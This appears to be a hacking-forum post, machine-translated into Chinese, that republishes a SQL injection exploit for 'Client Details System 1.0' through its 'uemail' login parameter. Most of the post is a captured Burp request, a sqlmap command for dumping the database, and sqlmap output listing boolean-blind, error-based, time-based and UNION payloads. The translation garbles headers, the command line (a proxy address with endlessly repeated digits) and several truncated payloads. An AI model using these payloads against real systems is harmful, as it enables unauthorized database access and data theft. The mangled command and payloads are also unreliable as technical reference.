H

客户详细信息系统1.0 -SQL注入

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
##参考:
## Description:
客户端详细信息系统1.0允许通过'/clientdetails/'中的参数'uemail'注入SQL注入。利用此问题可以允许攻击者补偿应用程序,访问或修改数据或利用基础数据库中的最新漏洞。
##概念证明:
+转到用户登录页面:'http://localhost/clientdetails/'
+填写电子邮件和密码。
+通过Burp Suite拦截请求,然后发送到中继器。
+将请求复制并粘贴到“ R.TXT”文件。
+捕获的Burp Request:
````````
POST/CLIENTDETAILS/HTTP/1.1
HOST: LOCALHOST
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/WebP,Image/apng,/; Q=0.8
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.5
CACHE-CONTROL:无缓存
内容长度: 317
content-type:应用程序/x-www-form-urlenceded
Referer: http://localhost/clientdetails/
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/100.0.4896.127 Safari/537.36
uemail=[email protected]=log+inpassword=p@ass123
````````
+使用SQLMAP利用。在SQLMAP中,使用“ Uemail”参数转储数据库。
````````
python sqlmap.py -r r.txt -p uemail -p uemail - 风险3-级5- threads 1-随机代理tamper=之间,随机箱-proxy='http://127.0.0.13:808080808080808080808080808080808080
````````
````````
---
参数: Uemail(POST)
Type:基于布尔的盲人
title:或基于布尔的盲人- 在哪里或有子句(不)
payload: uemail=[email protected]'或否6660=6660-- flrflogin=log inpassword=p@ass123
type:基于错误的
title: mysql=5.0和基于错误的- 在哪里,订购,按子句(floor)
payload: uemail=[email protected]'和(从(选择6854)(选择count(*),concat(0x717a717a71)(0x717a717a71 inpassword=p@ass123
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload: uemail=[email protected]'and(从(select(select(5)))qspa中选择5335
type:联合查询
title:通用联盟查询(null)-7列
payload: uemail=[email protected]'联盟全部选择null,concat(0x717a717a71,0x4557525949495444444444444444456f48756464694674747155555555554D6F794D777777767 7A4F50547145735052567278434F,0x7176627871),null,Null,Null,Null,Null,Null,Null,Null,Null --- login=log inpassword=p@ass123
---
[14:58:11] [INFO]后端DBMS是MySQL
Web Application Technology: Apache 2.4.53,PHP,PHP 8.1.6
后端DBMS: mySQL=5.0(Mariadb叉)
[14:58:11] [信息]获取当前数据库
当前数据库:“登录系统”
````````
+当前数据库:“登录系统”
![1](https://github.com/h4md153v63n/cves/assets/5091265/BFBEC122-5B56-42DF-BEDA-41DFDCAF527A)
 
后退
顶部